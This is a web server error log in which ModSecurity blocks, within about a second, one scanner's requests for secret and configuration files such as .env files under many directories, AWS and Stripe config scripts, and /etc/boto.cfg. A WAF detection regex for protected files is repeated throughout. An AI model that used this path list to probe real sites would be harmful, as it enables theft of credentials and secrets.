[Tue May 26 15:32:29.058144 2026] [security2:error] [pid 724639:tid 724673] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/be/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1ozAAAlSE"]
[Tue May 26 15:32:29.060779 2026] [security2:error] [pid 724639:tid 724676] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/beta/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1ozQAA3iQ"]
[Tue May 26 15:32:29.184604 2026] [security2:error] [pid 724639:tid 724680] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/client/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1o2QAA_Sg"]
[Tue May 26 15:32:29.189016 2026] [security2:error] [pid 724639:tid 724694] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/cms/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1o3QAAsDY"]
[Tue May 26 15:32:29.242942 2026] [security2:error] [pid 724639:tid 724691] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config.php"] [unique_id "ahVvtRKJRbiNp3eWdT1o5gAAhjM"]
[Tue May 26 15:32:29.327156 2026] [security2:error] [pid 724639:tid 724709] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/config/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1o7AAA6kU"]
[Tue May 26 15:32:29.349144 2026] [security2:error] [pid 724639:tid 724700] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/aws.php"] [unique_id "ahVvtRKJRbiNp3eWdT1o8QAAkDw"]
[Tue May 26 15:32:29.354108 2026] [security2:error] [pid 724639:tid 724706] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/config.inc.php"] [unique_id "ahVvtRKJRbiNp3eWdT1o9AAA00I"]
[Tue May 26 15:32:29.394477 2026] [security2:error] [pid 724639:tid 724705] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/config.php"] [unique_id "ahVvtRKJRbiNp3eWdT1o9gAA4UE"]
[Tue May 26 15:32:29.473365 2026] [security2:error] [pid 724639:tid 724712] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/env.php"] [unique_id "ahVvtRKJRbiNp3eWdT1o_gAAmUg"]
[Tue May 26 15:32:29.481636 2026] [security2:error] [pid 724639:tid 724727] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/module.config.php"] [unique_id "ahVvtRKJRbiNp3eWdT1pAgAAplc"]
[Tue May 26 15:32:29.484115 2026] [security2:error] [pid 724639:tid 724729] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/nexmo.php"] [unique_id "ahVvtRKJRbiNp3eWdT1pBAAAjFk"]
[Tue May 26 15:32:29.502288 2026] [security2:error] [pid 724639:tid 724735] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/stripe.php"] [unique_id "ahVvtRKJRbiNp3eWdT1pCwAAml8"]
[Tue May 26 15:32:29.715604 2026] [security2:error] [pid 724639:tid 724755] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/crm/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pJwAAiHM"]
[Tue May 26 15:32:29.724375 2026] [security2:error] [pid 724639:tid 724743] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/cron/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pKAAAtmc"]
[Tue May 26 15:32:29.753093 2026] [security2:error] [pid 724639:tid 724746] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/current/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pKQAAxmo"]
[Tue May 26 15:32:29.773684 2026] [security2:error] [pid 724639:tid 724745] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/demo/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pKwABA2k"]
[Tue May 26 15:32:29.776433 2026] [security2:error] [pid 724639:tid 724747] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/dev/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pLQABA2s"]
[Tue May 26 15:32:29.787036 2026] [security2:error] [pid 724639:tid 724751] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/develop/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pLwAA1G8"]
[Tue May 26 15:32:29.789857 2026] [security2:error] [pid 724639:tid 724752] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/developer/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pMAAA0HA"]
[Tue May 26 15:32:29.793359 2026] [security2:error] [pid 724639:tid 724760] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/development/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pMQAAvng"]
[Tue May 26 15:32:29.794188 2026] [cgid:error] [pid 724639:tid 724640] [remote 195.178.110.199:46950] AH01264: stderr from /home2/jhonwy9v/stvica.com/dnscfg.cgi: script not found or unable to stat
[Tue May 26 15:32:29.940869 2026] [security2:error] [pid 724639:tid 724651] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/erp/.env"] [unique_id "ahVvtRKJRbiNp3eWdT1pSAAAxws"]
[Tue May 26 15:32:29.991332 2026] [security2:error] [pid 724639:tid 724653] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVvtRKJRbiNp3eWdT1pSgAA8A0"]
[Tue May 26 15:32:29.995425 2026] [security2:error] [pid 724639:tid 724649] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/etc/boto.cfg"] [unique_id "ahVvtRKJRbiNp3eWdT1pSwAA_Qk"]
[Tue May 26 15:32:30.004656 2026] [security2:error] [pid 724639:tid 724654] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/fe/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pTAABBA4"]
[Tue May 26 15:32:30.068401 2026] [security2:error] [pid 724639:tid 724733] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/front/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pVAAAhl0"]
[Tue May 26 15:32:30.069748 2026] [security2:error] [pid 724639:tid 724655] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/frontend/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pVQAAug8"]
[Tue May 26 15:32:30.136187 2026] [security2:error] [pid 724639:tid 724669] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/info.php"] [unique_id "ahVvthKJRbiNp3eWdT1pXQAA7h0"]
[Tue May 26 15:32:30.140909 2026] [security2:error] [pid 724639:tid 724663] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/infophp.php"] [unique_id "ahVvthKJRbiNp3eWdT1pXgAA6hc"]
[Tue May 26 15:32:30.149649 2026] [security2:error] [pid 724639:tid 724666] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/infos.php"] [unique_id "ahVvthKJRbiNp3eWdT1pYQAA-ho"]
[Tue May 26 15:32:30.194768 2026] [security2:error] [pid 724639:tid 724675] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/laravel/.env"] [unique_id "ahVvthKJRbiNp3eWdT1paAAAsyM"]
[Tue May 26 15:32:30.206590 2026] [security2:error] [pid 724639:tid 724671] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/lms/.env"] [unique_id "ahVvthKJRbiNp3eWdT1paQAA0R8"]
[Tue May 26 15:32:30.216732 2026] [security2:error] [pid 724639:tid 724676] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/local/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pawAA5yQ"]
[Tue May 26 15:32:30.227502 2026] [security2:error] [pid 724639:tid 724684] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/market/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pbwAAtCw"]
[Tue May 26 15:32:30.233866 2026] [security2:error] [pid 724639:tid 724672] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/marketing/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pcQAA9yA"]
[Tue May 26 15:32:30.275719 2026] [security2:error] [pid 724639:tid 724683] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/media/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pcwAAkis"]
[Tue May 26 15:32:30.301802 2026] [security2:error] [pid 724639:tid 724692] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/new/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pegAAmTQ"]
[Tue May 26 15:32:30.309075 2026] [security2:error] [pid 724639:tid 724685] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node-api/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pewAAuS0"]
[Tue May 26 15:32:30.341184 2026] [security2:error] [pid 724639:tid 724763] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pfAABAns"]
[Tue May 26 15:32:30.352711 2026] [security2:error] [pid 724639:tid 724689] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/api/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pfQAAmjE"]
[Tue May 26 15:32:30.360573 2026] [security2:error] [pid 724639:tid 724688] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/node/backend/.env"] [unique_id "ahVvthKJRbiNp3eWdT1pfgAAojA"]
